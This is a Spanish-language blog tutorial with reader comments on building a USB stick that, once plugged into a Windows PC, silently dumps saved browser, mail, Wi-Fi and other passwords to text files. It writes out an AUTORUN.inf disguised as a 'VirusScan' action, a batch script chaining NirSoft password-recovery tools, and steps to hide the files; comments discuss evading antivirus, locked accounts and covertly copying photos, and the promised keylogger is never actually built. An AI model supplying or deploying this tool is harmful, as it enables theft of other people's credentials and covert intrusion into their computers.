Cómo crear un USB Keylogger/Stealer para recuperar contraseñas

Javier Olmedo

ladrondeusb

Hace unas semana publiqué una entrada sobre Stealers y expliqué lo que eran y para que servían, hoy vengo a explicaros como crear un USB que se autoejecute y recupere todas nuestras contraseñas del PC de manera automática, únicamente con conectarlo a nuestro PC, sin tocar absolutamente nada, ademas tendrá una función Keylogger, que registrará en un archivo .txt todo lo que pulsemos en nuestro teclado mientras el USB esté conectado al PC.

Pasos a seguir

1) Inserta un pendrive para formatearlo, haz «Click derecho» sobre la unidad y en «Formatear», podemos formatearlo en NTFS o FAT32 (este último es mas recomendado).usbpen1usbpen2

2) Abrimos el bloc de notas o similar y escribimos lo siguiente:

[autorun]
open = launch.bat
UseAutoPlay = 1
ACTION = Escaneando con VirusScan

Guardamos el archivo con el nombre AUTORUN.inf y lo dejamos dentro del USB.

3) Volvemos al bloc de notas para crear otro archivo, esta vez escribiremos:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

Guardamos el archivo con el nombre LAUNCH.bat y lo dejamos dentro del USB.

4) Visitamos la web http://www.nirsoft.net/ y nos descargamos las siguiente herramientas:

mspass.exe
mailpv.exe
iepv.exe
pspv.exe
PasswordFox.exe
OperaPassView.exe
ChromePass.exe
Dialupass2.exe
Netpass.exe
WirelessKeyView.exe
BulletsPassView.exe
VNCPassView.exe
OpenedFilesView.exe
ProduKey.exe
USBDeview.exe

Debemos de descomprimirlas en la raiz del USB, os dejo un link con las direcciones de las Herramientas.

Nos quedaría de la siguiente manera.

usbnir1

5) Descomprimimos todas las herramientas y ocultamos todos los archivos, al final todo quedaría así:

usbnir2 usbnir3

6) Quitamos el USB del ordenador y lo volvemos a insertar para comprobar que funciona, si todo ha ido bien nos aparecerán los siguientes .txt, que no hace falta que los abra porque ya se sabe lo que contienen, todas las contraseñas del sistema, incluidas las del WI-FI.

usbnir4

Espero que os haya gustado, y ya sabéis, no conectéis ningún USB a vuestro ordenador si no es vuestro o dudáis de lo que puede contener.

Comparte el artículo si te ha gustado

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on pinterest
Pinterest
Share on telegram
Telegram
Share on whatsapp
WhatsApp
Share on email
Email

76 respuestas

  1. OYE AMIGO FUNCIONA BIEN LA DE CONTRAER LA CONTRASEÑAS DE WIFI PERO POR ALGUNA RAZON NO SACA LA ULTIMA CONTRASEÑA LA ACTUAL, LO PROBE EN MI PC Y BUENO ESO ES LO QUE PASA

      1. Tu sabes lo que es un keylogger? hay muchas definiciones, pero que diré que keylogger significa «registrador de teclas». Es decir, guarda lo que escribe el usuario en el teclado, no lo que esta almacenado en el sistema. Pon «USB para recuperar contaseñas», pero no «keylogger» por que es falso.

  2. Funciona si abres el .bat manualmente, pero algunas programas ya están obsoletos (ChromePass, por ejemplo) y no sirven. Agradeceria mucho que hicieras un nuevo tutorial actualizado

  3. Creo que el tutorial ya esta algo obsoleto, lamentablemente no me funciono (Uso Windows 10). Espero que en un futuro actualices el tutorial o hagas algún otro con el mismo propósito.
    Muchas gracias por todo y muy bien explicado.

  4. Hola amigo intente los pasos pero no funcionó podrías actualizarlo ya q al usar el usb no salió ningún archivo y la otra es funciona con el pc bloqueado con cuenta de usuario y si el antivirus lo puede detectar y bloquear …se espera pronta respuesta

    1. Hola Roberto,
      El post es de hace tiempo, es posible que algunas cosas hayan cambiado, de todas maneras, veré si saco tiempo y hago un post sobre USB Rubber Ducky, esto es indetectable por los antivirus y se ajusta más a lo que necesitas.
      Saludos,
      Gracias!

  5. amigo ya lo puliste? una duda al crear el archivo launch.bat y lo quiero ejecutar se abre con el bloc de notas me fui a aplicaciones predeterminadas pero no me da otra opcion que puedo hacer solo es en mi maquina win 8.1
    y si ejecuto las apps me da un archivo .cfg

  6. hola amigo, me salio todo perfecto pero lo unica la duda es que no me aparece los documentos de textos o ya despues de conectarlo el usb ¿ que debe de suceder? espero y me respondas y muchas gracias amigo por el tutorial.

  7. buenas Javier creo que haces un buen trabajo al brindarnos tu experiencia y conocimiento en forma gratuita…mas lamento decir que no me ha funcionado en mi en windows 10. espero me des alguna solución.
    un abrazo!!

  8. Hola javier, muchas gracias por el aporte! primero que nada no le des bola a los comentarios negativos segui para adelante.

    Con respecto al .inf no me estaría funcionando conecto el pen pero el .bat no se ejecuta si lo hago manualmente si

    Sabes que puede ser?

    Saludos!

    1. Buenas Matias,

      Te agradezco que valores mi trabajo.
      Dependiendo en el sistema operativo / máquina que lo hagas lo hará automáticamente o no.
      Puedes crear accesos directos en el pen con .bat ocultos para que se ejecute.

      Saludos.
      Gracias.

  9. Buenas.

    He seguido el tutorial al pie de la letra y funciona todo salvo el generar automáticamente los archivos de texto con las contraseñas. Es decir, puedo ejecutar manualmente el .exe de algún programa, como el ChromePass y ver o guardar por mi mismo el archivo de texto pero no lo genera solo el .bat.

    Lo he probado en dos equipos distintos y no ha dado resultado, en uno veía los archivos ocultos y en el otro directamente no hacía nada.
    Cabe decir que ambos ordenadores tienen W10.

    ¿Tiene algo que ver el sistema operativo? ¿He hecho algo mal?

    Un saludo y gracias por tu tiempo.

  10. hola como estas Javier muy bueno el tutorial, lo unico que como una persona pregunto no todos los ejecutables crean el txt como por ejemplo el ChromePass.exe y creo que es el mas importante a la hora de extraer contraseñas, solo crea un archivo cfg sin informacion importante… sabes como habria que hacer para solucionarlo? y ademas seria ideal agregar algun comando para que vuelva a cerrar todas las ventanas que abre el ejecutable para que sea del todo automatica..Gracias!

    1. Estimado saludos, gracias por compartir tus conocimientos…la verdad muy agradecido… para descomprirmir los archivos en el pendrive se hace 1 por 1… o se seleccionan todos y se extraen todos ..porq me sale cada vz que se debe reemplazar un archivo que hago se le da si, a todo o se le da no, a todo con respecto al archivo http://www.nirsoft.net/utils/dialupass2.html ya no existe hay una version 3 habra algun problema con eso esperando ..una pronta respuesta estimado y gracias nuevamente

  11. Me extraña que supuestamente seas un informático, programador, apasionado de la seguridad… y publiques esta mierda en el año 2015, cuando eso ya hace años que no funciona, debido a que los S.O. actuales, el autorun lo tiene deshabilitado por defecto. O intentas vender humo o de informático tienes poco.

    1. Hola MrDeiii,

      Agradecería que tus comentarios no faltaran el respeto, puede parecerte una «mierda», pero como te he comentado en el comentario anterior, funciona perfectamente incluso en Windows 10, otra cosa es que seas «habilidoso» para activar el autorun.
      En cuanto a lo de informático y programador, no sé si lo seré, desde luego he estudiado unos cuantos añitos y aquí tengo los títulos.

      Saludos.

    1. Eso que explica no funciona. Funcionaba hace unos 10 años o mas, pero actualmente no, ja que se ejecuta automáticamente con autorun y el autorun, en los sistemas operativos actuales esta deshabilitado. Creo que el ultimo Windows que lo tenia habilitado por defecto, era el XP.

  12. Buenas, e echo todo el proceso, pero cuando quito la memoria y vuelvo y la meto no me aparece ninguna contraseña, me aparece sin nada le mamoria, el archivo Dialupass2.exe no se encuentra, se encuentra es la vercion 3, que fue la que descargue, hay algun problema de pronto en eso ?

  13. muy bueno el post!!! me he quedado impresionada. Me gustaria saber si hay alguna opcion de copiar el contenido de todas las imagenes jpeg o videos del pc tb al usb en modo oculto
    muchas gracias

  14. Las herramientas de Nir ya las conocía, pero este método está muy bien….siempre y cuando no tenga inhabilitado el autorun del usb…

    Lo probaré, muy instructivo….le enseñaré a mi hijo que no se fie de un pendrive ajeno…

    Saludos

Deja tu comentario